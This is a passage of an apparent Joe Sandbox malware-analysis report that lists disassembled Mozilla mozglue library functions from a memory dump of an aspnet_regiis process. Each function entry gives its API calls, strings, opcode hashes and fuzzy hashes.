                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
                                                                                                                            • String ID: MOZ_CRASH()
                                                                                                                            • API String ID: 2055633661-2608361144
                                                                                                                            • Opcode ID: 13fcc0dce73deb3ddb998168d738852d2c5293234c9844b22a0ec4eb48760a07
                                                                                                                            • Instruction ID: d642a812c0f67afa96b358c93ec64a23a856cb5f1467a1516116dea3deb1c4f5
                                                                                                                            • Opcode Fuzzy Hash: 13fcc0dce73deb3ddb998168d738852d2c5293234c9844b22a0ec4eb48760a07
                                                                                                                            • Instruction Fuzzy Hash: E741CC71B0021A8BDB108FFCD89CBAE7AB5EF4A348F044029E915D7781EB7598158BD5
                                                                                                                            Function 6CC85FF0 Relevance: 15.1, APIs: 10, Instructions: 76COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 6CC86009
                                                                                                                            • ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6CC86024
                                                                                                                            • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(6CC2EE51,?), ref: 6CC86046
                                                                                                                            • OutputDebugStringA.KERNEL32(?,6CC2EE51,?), ref: 6CC86061
                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CC86069
                                                                                                                            • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CC86073
                                                                                                                            • _dup.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CC86082
                                                                                                                            • _fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,6CCA148E), ref: 6CC86091
                                                                                                                            • __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,6CC2EE51,00000000,?), ref: 6CC860BA
                                                                                                                            • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CC860C4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: PrintfTarget@mozilla@@$?vprint@DebugDebuggerOutputPresentString__acrt_iob_func__stdio_common_vfprintf_dup_fdopen_filenofclose
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3835517998-0
                                                                                                                            • Opcode ID: 1e3e338851f1bedcc55f479183720f18dcba606cd571e63a62ed04aad337759c
                                                                                                                            • Instruction ID: a701858f641fa34f46ec7df6202d3dd04354e9b9b71fd791431193b36f08630b
                                                                                                                            • Opcode Fuzzy Hash: 1e3e338851f1bedcc55f479183720f18dcba606cd571e63a62ed04aad337759c
                                                                                                                            • Instruction Fuzzy Hash: A021D3B1A0020C9FDB105F64EC0CAAE7BB8FF45318F048428E81A97641DB34A959CFE5
                                                                                                                            Function 6CC37E90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 116stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC37EA7
                                                                                                                            • malloc.MOZGLUE(00000001), ref: 6CC37EB3
                                                                                                                              • Part of subcall function 6CC3CAB0: EnterCriticalSection.KERNEL32(?), ref: 6CC3CB49
                                                                                                                              • Part of subcall function 6CC3CAB0: LeaveCriticalSection.KERNEL32(?), ref: 6CC3CBB6
                                                                                                                            • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6CC37EC4
                                                                                                                            • mozalloc_abort.MOZGLUE(?), ref: 6CC37F19
                                                                                                                            • malloc.MOZGLUE(?), ref: 6CC37F36
                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CC37F4D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
                                                                                                                            • String ID: d
                                                                                                                            • API String ID: 204725295-2564639436
                                                                                                                            • Opcode ID: 48dc5d7b538a2e6504da8fc5564c69b7560657ccc7dd38ae91e61ac4e416cbd4
                                                                                                                            • Instruction ID: b6dcc53884d683cba53b9b5248040462c1e830c6666f060c0527ae2cf06f3468
                                                                                                                            • Opcode Fuzzy Hash: 48dc5d7b538a2e6504da8fc5564c69b7560657ccc7dd38ae91e61ac4e416cbd4
                                                                                                                            • Instruction Fuzzy Hash: 5E311661E0075897DB009F68DC445FEB778FF96308F445269EC49A7612FB30A9D8C391
                                                                                                                            Function 6CC33E80 Relevance: 13.7, APIs: 9, Instructions: 246memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 6CC33EEE
                                                                                                                            • RtlFreeHeap.NTDLL ref: 6CC33FDC
                                                                                                                            • RtlAllocateHeap.NTDLL(?,00000000,00000040), ref: 6CC34006
                                                                                                                            • RtlFreeHeap.NTDLL ref: 6CC340A1
                                                                                                                            • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6CC33CCC), ref: 6CC340AF
                                                                                                                            • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6CC33CCC), ref: 6CC340C2
                                                                                                                            • RtlFreeHeap.NTDLL ref: 6CC34134
                                                                                                                            • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,?,?,?,?,6CC33CCC), ref: 6CC34143
                                                                                                                            • RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,?,?,?,?,6CC33CCC), ref: 6CC34157
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Free$Heap$StringUnicode$Allocate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3680524765-0
                                                                                                                            • Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                                                                            • Instruction ID: 401fbf9655206fca6f7a9042c99cf8c990a24a76915c36e37a910b71f5896e48
                                                                                                                            • Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                                                                            • Instruction Fuzzy Hash: 60A1A2B1A00215CFDB40CF29D880659BBB5FF48308F695199D909AF752E776D886CFA0
                                                                                                                            Function 6CC79D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CC78273), ref: 6CC79D65
                                                                                                                            • free.MOZGLUE(6CC78273,?), ref: 6CC79D7C
                                                                                                                            • free.MOZGLUE(?,?), ref: 6CC79D92
                                                                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CC79E0F
                                                                                                                            • free.MOZGLUE(6CC7946B,?,?), ref: 6CC79E24
                                                                                                                            • free.MOZGLUE(?,?,?), ref: 6CC79E3A
                                                                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6CC79EC8
                                                                                                                            • free.MOZGLUE(6CC7946B,?,?,?), ref: 6CC79EDF
                                                                                                                            • free.MOZGLUE(?,?,?,?), ref: 6CC79EF5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 956590011-0
                                                                                                                            • Opcode ID: 4331b52c6abdb45f14a813c0fbbd72a45a8848134d848e6902030819072101cd
                                                                                                                            • Instruction ID: d149bbe3daaaa7d070e19d35c3ce0ef270e7a8f5caff7dfa78f92585e052077c
                                                                                                                            • Opcode Fuzzy Hash: 4331b52c6abdb45f14a813c0fbbd72a45a8848134d848e6902030819072101cd
                                                                                                                            • Instruction Fuzzy Hash: 6971ADB0909B418BC722CF18C48095BF3F4FF99324B44C659E89A5BB02FB30E885CB91
                                                                                                                            Function 6CC7DDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6CC7DDCF
                                                                                                                              • Part of subcall function 6CC5FA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC5FA4B
                                                                                                                              • Part of subcall function 6CC790E0: free.MOZGLUE(?,00000000,?,?,6CC7DEDB), ref: 6CC790FF
                                                                                                                              • Part of subcall function 6CC790E0: free.MOZGLUE(?,00000000,?,?,6CC7DEDB), ref: 6CC79108
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC7DE0D
                                                                                                                            • free.MOZGLUE(00000000), ref: 6CC7DE41
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC7DE5F
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC7DEA3
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC7DEE9
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6CC6DEFD,?,6CC34A68), ref: 6CC7DF32
                                                                                                                              • Part of subcall function 6CC7DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CC7DB86
                                                                                                                              • Part of subcall function 6CC7DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CC7DC0E
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6CC6DEFD,?,6CC34A68), ref: 6CC7DF65
                                                                                                                            • free.MOZGLUE(?), ref: 6CC7DF80
                                                                                                                              • Part of subcall function 6CC45E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CC45EDB
                                                                                                                              • Part of subcall function 6CC45E90: memset.VCRUNTIME140(6CC87765,000000E5,55CCCCCC), ref: 6CC45F27
                                                                                                                              • Part of subcall function 6CC45E90: LeaveCriticalSection.KERNEL32(?), ref: 6CC45FB2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 112305417-0
                                                                                                                            • Opcode ID: 09c4645ba257723d4e9acc920a76063ecbca225e5ce7674cea0d0985a26e82f0
                                                                                                                            • Instruction ID: 0206addafb621cbb305aa9cda32c4f20c20eecace6f7d87745a51b68b84d49c6
                                                                                                                            • Opcode Fuzzy Hash: 09c4645ba257723d4e9acc920a76063ecbca225e5ce7674cea0d0985a26e82f0
                                                                                                                            • Instruction Fuzzy Hash: B351D6726016019BD7329F29D8806AFB3B6FF95318F95411DD85A53B00F731F85ACBA2
                                                                                                                            Function 6CC85D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6CC85C8C,?,6CC5E829), ref: 6CC85D32
                                                                                                                            • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6CC85C8C,?,6CC5E829), ref: 6CC85D62
                                                                                                                            • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6CC85C8C,?,6CC5E829), ref: 6CC85D6D
                                                                                                                            • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6CC85C8C,?,6CC5E829), ref: 6CC85D84
                                                                                                                            • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6CC85C8C,?,6CC5E829), ref: 6CC85DA4
                                                                                                                            • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6CC85C8C,?,6CC5E829), ref: 6CC85DC9
                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6CC85DDB
                                                                                                                            • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6CC85C8C,?,6CC5E829), ref: 6CC85E00
                                                                                                                            • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6CC85C8C,?,6CC5E829), ref: 6CC85E45
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2325513730-0
                                                                                                                            • Opcode ID: 00d94c3cda4e32344d49db7c7cd43804de61fc005d938b1ee2cb5b1f4ef4b58a
                                                                                                                            • Instruction ID: bc081d787588725004d19f22211d88113041eaaf862d3bb0093748e5dd6c5541
                                                                                                                            • Opcode Fuzzy Hash: 00d94c3cda4e32344d49db7c7cd43804de61fc005d938b1ee2cb5b1f4ef4b58a
                                                                                                                            • Instruction Fuzzy Hash: DB419270B012098FDB10DFA5D99CAAE7BB5EF49318F0440A9D90697781FB74E805CB61
                                                                                                                            Function 6CC5CC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6CC231A7), ref: 6CC5CDDD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                            • API String ID: 4275171209-2186867486
                                                                                                                            • Opcode ID: 960cf3a35980ae80110229332364e6c9429e5184942e48ba38720d67822af9c6
                                                                                                                            • Instruction ID: bfcb1269cdbc8c2f1e6f7b99c58356a59198f5d4dc79cfe484adfaf6dc31ae6e
                                                                                                                            • Opcode Fuzzy Hash: 960cf3a35980ae80110229332364e6c9429e5184942e48ba38720d67822af9c6
                                                                                                                            • Instruction Fuzzy Hash: EA31A7307402095BEB00AFA58C59B6E7775BF49754F644119F510ABAC0FBB1D4318B99
                                                                                                                            Function 6CC2ECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6CC2F100: LoadLibraryW.KERNEL32(shell32,?,6CC9D020), ref: 6CC2F122
                                                                                                                              • Part of subcall function 6CC2F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6CC2F132
                                                                                                                            • moz_xmalloc.MOZGLUE(00000012), ref: 6CC2ED50
                                                                                                                            • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC2EDAC
                                                                                                                            • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6CC2EDCC
                                                                                                                            • CreateFileW.KERNEL32 ref: 6CC2EE08
                                                                                                                            • free.MOZGLUE(00000000), ref: 6CC2EE27
                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CC2EE32
                                                                                                                              • Part of subcall function 6CC2EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6CC2EBB5
                                                                                                                              • Part of subcall function 6CC2EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6CC5D7F3), ref: 6CC2EBC3
                                                                                                                              • Part of subcall function 6CC2EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6CC5D7F3), ref: 6CC2EBD6
                                                                                                                            Strings
                                                                                                                            • \Mozilla\Firefox\SkeletonUILock-, xrefs: 6CC2EDC1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
                                                                                                                            • String ID: \Mozilla\Firefox\SkeletonUILock-
                                                                                                                            • API String ID: 1980384892-344433685
                                                                                                                            • Opcode ID: d37819a37f3f9db348c0f4e5b30c634744cb15c48c814e3f928df235eed3a46f
                                                                                                                            • Instruction ID: 3e8f221d28141a1b156eb86acbf99e4619bacdb1d1c8147247f41024a0b2f895
                                                                                                                            • Opcode Fuzzy Hash: d37819a37f3f9db348c0f4e5b30c634744cb15c48c814e3f928df235eed3a46f
                                                                                                                            • Instruction Fuzzy Hash: DE51CF71D052188BDB00DF79D8446EEB7B0AF59319F44852DE8557B780FB38A988CBE2
                                                                                                                            Function 6CC9A520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6CC9A565
                                                                                                                              • Part of subcall function 6CC9A470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC9A4BE
                                                                                                                              • Part of subcall function 6CC9A470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CC9A4D6
                                                                                                                            • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6CC9A65B
                                                                                                                            • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CC9A6B6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
                                                                                                                            • String ID: 0$z
                                                                                                                            • API String ID: 310210123-2584888582
                                                                                                                            • Opcode ID: 2ce7c9f891e6afbfec308a7292ebcb0ae6d8fe7b5fdb1317a086a7ebb6bf2029
                                                                                                                            • Instruction ID: 3b05efe73b375843cc99fab3e17bda5048e33b64ecb59c3c9a75ae2c5b4c8fdf
                                                                                                                            • Opcode Fuzzy Hash: 2ce7c9f891e6afbfec308a7292ebcb0ae6d8fe7b5fdb1317a086a7ebb6bf2029
                                                                                                                            • Instruction Fuzzy Hash: 38411671A097459FC341DF29C480A9FBBE5BFC9354F408A2EF49987650EB30E649CB92
                                                                                                                            Function 6CC69420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6CC5AB89: EnterCriticalSection.KERNEL32(6CCAE370,?,?,?,6CC234DE,6CCAF6CC,?,?,?,?,?,?,?,6CC23284), ref: 6CC5AB94
                                                                                                                              • Part of subcall function 6CC5AB89: LeaveCriticalSection.KERNEL32(6CCAE370,?,6CC234DE,6CCAF6CC,?,?,?,?,?,?,?,6CC23284,?,?,6CC456F6), ref: 6CC5ABD1
                                                                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC34A68), ref: 6CC6945E
                                                                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC69470
                                                                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC69482
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC6949F
                                                                                                                            Strings
                                                                                                                            • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6CC6946B
                                                                                                                            • MOZ_BASE_PROFILER_LOGGING, xrefs: 6CC6947D
                                                                                                                            • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6CC69459
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                                                                                                            • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                                                                                                            • API String ID: 4042361484-1628757462
                                                                                                                            • Opcode ID: 2a6a232e1a7eeafe5e36bce4fda6db2ecffc41a810b0b7b495762980e0d8dd92
                                                                                                                            • Instruction ID: 4fb53ab997b793cca17d77852ca1ea9240583fb51155ab8adcc1f99cb8d76e3b
                                                                                                                            • Opcode Fuzzy Hash: 2a6a232e1a7eeafe5e36bce4fda6db2ecffc41a810b0b7b495762980e0d8dd92
                                                                                                                            • Instruction Fuzzy Hash: 4401AC70A001028FD7109BDFE95DA6E33B5AB46369F040537ED06C7F51F631D8668A9B
                                                                                                                            Function 6CC70F40 Relevance: 12.2, APIs: 8, Instructions: 171threadtimeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC70F6B
